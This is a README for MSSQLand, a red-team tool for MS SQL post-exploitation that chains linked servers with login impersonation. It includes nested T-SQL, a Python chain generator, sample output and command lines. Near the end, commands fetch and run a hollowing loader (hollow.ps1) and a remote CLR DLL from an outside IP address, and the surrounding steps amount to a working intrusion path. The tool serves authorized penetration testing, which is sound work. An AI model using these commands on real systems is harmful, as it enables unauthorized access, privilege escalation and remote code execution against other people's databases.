Interact with Microsoft SQL Server (MS SQL) servers and their linked instances in restricted environments, without the need for complex T-SQL queries.

n3rada/MSSQLand

✈️ MSSQLand

Land gracefully in your target MSSQL DBMS, as if arriving on a business-class flight with a champagne glass in hand. 🥂

MSSQLand is the go-to tool for interacting with the Microsoft SQL Server (MSSQL) database management system (DBMS) during red team activities. It is designed for constrained environments where operations must be executed directly through your beacon (for Linux-based usage, consider MSSqlPwner instead). It lets you traverse chains of linked servers, impersonating any login you are authorised to impersonate at each hop, and run any supported action on the final hop.

📌 Documentation

  • For a full list of commands, arguments, and actions, check out COMMANDS.md.
  • For an overview of the project structure, refer to STRUCTURE.md.

📖 Example

The tool's output is enriched with timestamps and contextual information (server, database, login and the database user it maps to), which makes it suitable for high-quality screenshots in reports. All output tables are Markdown-friendly and can be copied and pasted directly into your notes.

Searching pass

👑 Show Time

You gain access to the server SQL01, where your login is mapped to the user dbo. To reach the linked server SQL02 you need to impersonate webapp02; on SQL02 you need to impersonate webapp03 to go one hop further, and so on. Let's say you've landed an agent inside a sqlservr.exe process running as the high-privileged NT AUTHORITY\SYSTEM. Lucky you!

After some reconnaissance, you suspect this is a multi-hop linked server chain. Typing out all those RPC or OPENQUERY calls manually?

This is what it takes to check whether you are sysadmin on SQL03 when you must impersonate webapp03 on SQL02 and webapp04 on SQL03:

  • OPENQUERY (if `sys.servers.is_data_access_enabled` is set for the link; the inner batch must return a result set, which the final `SELECT` does). Note the `;` before the outer `REVERT`: without it, `REVERT` is read as part of the `SELECT` and the batch fails to parse.

```sql
SELECT * FROM OPENQUERY([SQL02], 'EXECUTE AS LOGIN = ''webapp03''; SELECT * FROM OPENQUERY([SQL03], ''EXECUTE AS LOGIN = ''''webapp04''''; SELECT IS_SRVROLEMEMBER(''''sysadmin''''); REVERT;''); REVERT;')
```

  • RPC Out (if `sys.servers.is_rpc_out_enabled` is set for the link):

```sql
EXEC ('EXECUTE AS LOGIN = ''webapp03''; EXEC (''EXECUTE AS LOGIN = ''''webapp04''''; SELECT IS_SRVROLEMEMBER(''''sysadmin''''); REVERT;'') AT [SQL03]; REVERT;') AT [SQL02]
```

Every hop re-quotes the whole inner batch, so the runs of consecutive single quotes double at each hop (2, 4, 8, ...): a three-hop chain is already painful to type and easy to get wrong by hand.
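The rule behind both queries, as an added example written for this page in Python (it is not MSSQLand's code, which is C#): each hop wraps the next hop's batch in a string literal, doubling every single quote, and an `EXECUTE AS LOGIN ... REVERT` pair is attached to the hop on which that login is impersonated. The hop list follows the `/l:` syntax used in the commands on this page (a server name, optionally followed by the login to impersonate once you arrive there). The function names, the `peel`/`unwind` audit helpers and the sample chain are assumptions made here; the generator also goes beyond the two-hop case above and handles any chain length.

```python
"""Generate (and audit) the nested T-SQL for a linked-server chain with
per-hop login impersonation. Added example for this page, not MSSQLand's
code. Function names and the constructed sample inputs are assumptions."""
import re


def sql_quote(s):
    """Escape a value for embedding inside a single-quoted T-SQL literal."""
    return s.replace("'", "''")


def parse_chain(spec):
    """Parse a hop list in the README's /l: syntax, e.g.
    'SQL02:webapp03,SQL03:webapp04,SQL04' ->
    [('SQL02', 'webapp03'), ('SQL03', 'webapp04'), ('SQL04', None)].
    The login after a server name is impersonated once you arrive on that server."""
    hops = []
    for hop in spec.split(","):
        server, _, login = hop.partition(":")
        hops.append((server.strip(), login.strip() or None))
    return hops


def impersonate(login, body):
    """Run `body` as `login` on the current hop, then return to the original context."""
    return f"EXECUTE AS LOGIN = '{sql_quote(login)}'; {body}; REVERT;"


def build_chain(hops, query, mode="rpc"):
    """Wrap `query` (no trailing semicolon) so that it executes on the last hop.
    mode='rpc'       -> EXEC ('...') AT [server]        (needs is_rpc_out_enabled)
    mode='openquery' -> SELECT * FROM OPENQUERY(...)    (needs is_data_access_enabled;
                        the innermost batch must return a result set)
    Work from the innermost hop outward: every layer re-escapes the whole inner
    body, which is why the quote runs double at each hop."""
    body = query
    for server, login in reversed(hops):
        if login:
            body = impersonate(login, body)
        if mode == "rpc":
            body = f"EXEC ('{sql_quote(body)}') AT [{server}]"
        elif mode == "openquery":
            body = f"SELECT * FROM OPENQUERY([{server}], '{sql_quote(body)}')"
        else:
            raise ValueError(f"unknown mode {mode!r}")
    return body


_RPC_RE = re.compile(r"^EXEC \('(.*)'\) AT \[([^\]]+)\]$", re.DOTALL)
_OQ_RE = re.compile(r"^SELECT \* FROM OPENQUERY\(\[([^\]]+)\], '(.*)'\)$", re.DOTALL)
_IMP_RE = re.compile(r"^EXECUTE AS LOGIN = '((?:[^']|'')*)'; (.*); REVERT;$", re.DOTALL)


def peel(statement):
    """Undo one layer: (server, impersonated login or None, body as that server sees it).
    Use it to check what really executes on each hop before sending a long chain."""
    for rx, server_group, body_group in ((_RPC_RE, 2, 1), (_OQ_RE, 1, 2)):
        m = rx.match(statement)
        if m:
            server = m.group(server_group)
            body = m.group(body_group).replace("''", "'")
            im = _IMP_RE.match(body)
            if im:
                return server, im.group(1).replace("''", "'"), im.group(2)
            return server, None, body
    raise ValueError("not a linked-server wrapper")


def unwind(statement):
    """Peel every layer; returns (hops, final query). Round-trips build_chain
    output as long as the final query is not itself an EXEC AT / OPENQUERY."""
    hops = []
    while True:
        try:
            server, login, statement = peel(statement)
        except ValueError:
            return hops, statement
        hops.append((server, login))


def longest_quote_run(statement):
    """Longest run of consecutive single quotes: 2**depth for a literal nested `depth` hops deep."""
    return max((len(r) for r in re.findall(r"'+", statement)), default=0)


if __name__ == "__main__":
    # Constructed sample: the three-hop chain from this README, ending on SQL04.
    hops = parse_chain("SQL02:webapp03,SQL03:webapp04,SQL04")
    query = "SELECT IS_SRVROLEMEMBER('sysadmin')"
    for mode in ("rpc", "openquery"):
        print(f"[{mode}] {build_chain(hops, query, mode)}\n")
    print("hops seen when unwinding:", unwind(build_chain(hops, query))[0])
    print("longest quote run:", longest_quote_run(build_chain(hops, query)))
```

`build_chain` reproduces the two hand-written queries above exactly for the two-hop case; `unwind` is the check a practitioner wants before pasting a long chain into a beacon, since it shows, hop by hop, which server executes which batch under which login.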

No thanks 🚫. Let MSSQLand handle the heavy lifting so you can focus on the big picture. Impersonate webapp02 on the local hop (`/h:localhost:webapp02`), webapp03 on SQL02 and webapp04 on SQL03, then enumerate the linked servers of SQL04:

```
.\MSSQLand.exe /h:localhost:webapp02 /c:token /l:SQL02:webapp03,SQL03:webapp04,SQL04 /a:links
```

The output is as follows:

```
[>] Trying to connect with TokenCredentials
[+] Connection opened successfully
|-> Server: localhost,1433
|-> Database: master
|-> Server Version: 15.00.2000
|-> Client Workstation ID: WS-445c74
|-> Client Connection ID: b7c172a7-c349-4268-a466-285d2af89fbb
[i] Logged in on SQL01 as NT AUTHORITY\SYSTEM
|-> Mapped to the user dbo
[i] You can impersonate anyone on SQL01 as a sysadmin
[+] Successfully impersonated user: webapp02
[i] Logged in as webapp02
|-> Mapped to the user dbo
[i] Execution chain: SQL02 -> SQL03 -> SQL04
[i] Logged in on SQL04 as webapps
|-> Mapped to the user guest

[>] Executing action 'Links' against SQL04
|-> Retrieving Linked SQL Servers

| Last Modified        | Link  | Product    | Provider | Data Source | Local Login | Remote Login | RPC Out | OPENQUERY | Collation |
| -------------------- | ----- | ---------- | -------- | ----------- | ----------- | ------------ | ------- | --------- | --------- |
| 7/7/2020 1:02:17 PM  | SQL05 | SQL Server | SQLNCLI  | SQL05       | webapp05    | webapps      | True    | True      | False     |
```

Now you want to verify who you can impersonate at the end of the chain:

```
.\MSSQLand.exe /h:localhost:webapp02 /c:token /l:SQL02:webapp03,SQL03:webapp04,SQL04 /a:impersonate
```

The output shows:

```
[>] Trying to connect with TokenCredentials
[+] Connection opened successfully
|-> Server: localhost,1433
|-> Database: master
|-> Server Version: 15.00.2000
|-> Client Workstation ID: WS-445c74
|-> Client Connection ID: b7c172a7-c349-4268-a466-285d2af89fbb
[i] Logged in on SQL01 as NT AUTHORITY\SYSTEM
|-> Mapped to the user dbo
[i] You can impersonate anyone as a sysadmin
[+] Successfully impersonated user: webapp02
[i] Server chain: SQL02 -> SQL03 -> SQL04
[i] Logged in as webapps
|-> Mapped to the user guest

[>] Executing action 'Impersonation' against SQL04
|-> Starting impersonation check for all logins
|-> Checking impersonation permissions individually

| Logins      | Impersonation |
| ----------- | ------------- |
| sa          | No            |
| MarieJo     | Yes           |
| Imane       | Yes           |
| John        | No            |
```

Great! Now you can add MarieJo as the login to impersonate on SQL04 and fetch your loader directly from there:

```
.\MSSQLand.exe /h:localhost:webapp02 /c:token /l:SQL02:webapp03,SQL03:webapp04,SQL04:MarieJo /a:pwshdl "172.16.118.218/d/g/hollow.ps1"
```

Or load a library remotely through the Common Language Runtime (CLR) by swapping the action for:

```
/a:clr \"http://172.16.118.218/d/SqlLibrary.dll\"
```

🫂 Contributing

Contributions to MSSQLand are welcome and appreciated, whether they fix bugs, add new features, improve the documentation or share feedback. Open source thrives on collaboration and recognition, and contributions large or small help improve the tool and its community.

Here, no one will be erased from Git history. There is nothing to fear: no one will copy-paste your code without adhering to the collaborative ethos of open source.

Please see the CONTRIBUTING.md for detailed guidelines on how to get started.

🥚 Origin

MSSQLand was initially inspired by SQLRecon, which provided a solid foundation for MS SQL post-exploitation and reconnaissance. However, during my contributions to SQLRecon, particularly in addressing chained linked server traversal and enhancing user impersonation, I encountered significant roadblocks in how contributions were handled. My pull request, which introduced major improvements in impersonation, chaining, and context management, was ultimately not merged but copy-pasted.

Rather than let this work go to waste, I decided to develop MSSQLand, an OOP-driven, modular, and community-friendly alternative. Unlike SQLRecon, which required deep refactoring to make simple modifications, MSSQLand was built with developers in mind: it is designed for extensibility, so new features can be integrated while keeping the code base clear and simple. It aims to provide a structured, customizable, and operator-friendly experience for engagements requiring MS SQL exploitation.

While I appreciate the inspiration SQLRecon provided, MSSQLand is designed to be open to contributions, transparent in development, and aligned with the collaborative spirit of open-source software.

⚠️ Disclaimer

This tool is designed for educational purposes only and is intended to assist security professionals in understanding and testing the security of SQL Server environments in authorized engagements. It is specifically crafted to be used in controlled environments, such as:

  • Penetration testing labs (e.g., HackTheBox, OffSec exam scenarios).
  • Personal lab setups designed for ethical hacking and security research.

Legal Notice

Any unauthorized use of this tool in real-world environments or against systems without explicit permission from the system owner is strictly prohibited and may violate legal and ethical standards. The creators and contributors of this tool are not responsible for any misuse or damage caused.

Use responsibly and ethically. Always respect the law and obtain proper authorization.
